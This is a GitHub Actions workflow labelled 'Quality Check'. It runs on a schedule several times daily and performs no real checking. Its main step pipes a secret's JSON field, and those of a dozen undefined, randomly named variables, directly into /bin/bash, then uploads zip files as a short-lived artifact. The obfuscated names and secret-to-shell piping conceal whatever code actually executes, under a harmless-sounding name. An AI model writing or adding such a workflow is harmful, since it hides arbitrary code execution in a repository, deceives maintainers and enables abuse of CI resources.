name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '5 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          oln33: ${{ secrets.oln33 }}
        run: |
          printf '%s' "$oln33" | jq -r .pl181 | /bin/bash
          printf '%s' "$zaq656" | jq -r .jam095 | /bin/bash
          printf '%s' "$x8" | jq -r .mtk06564 | /bin/bash
          echo $okhl2 | jq -r .ki0045 | /bin/bash
          printf '%s' "$mytfl99" | jq -r .cb6 | /bin/bash
          echo $irilr0 | jq -r .lx12 | /bin/bash
          printf '%s' "$yyav731" | jq -r .m1 | /bin/bash
          echo $vpf230 | jq -r .hsj83774 | /bin/bash
          printf '%s' "$e14" | jq -r .zccpf7 | /bin/bash
          printf '%s' "$mjyp48" | jq -r .buak71 | /bin/bash
          echo $fsjz29118 | jq -r .olz50102 | /bin/bash
          echo $bgski742 | jq -r .ji556 | /bin/bash
          printf '%s' "$rfy4787" | jq -r .gjrd51 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: ofPDHwLB
          path: "*.zip"
          retention-days: 1
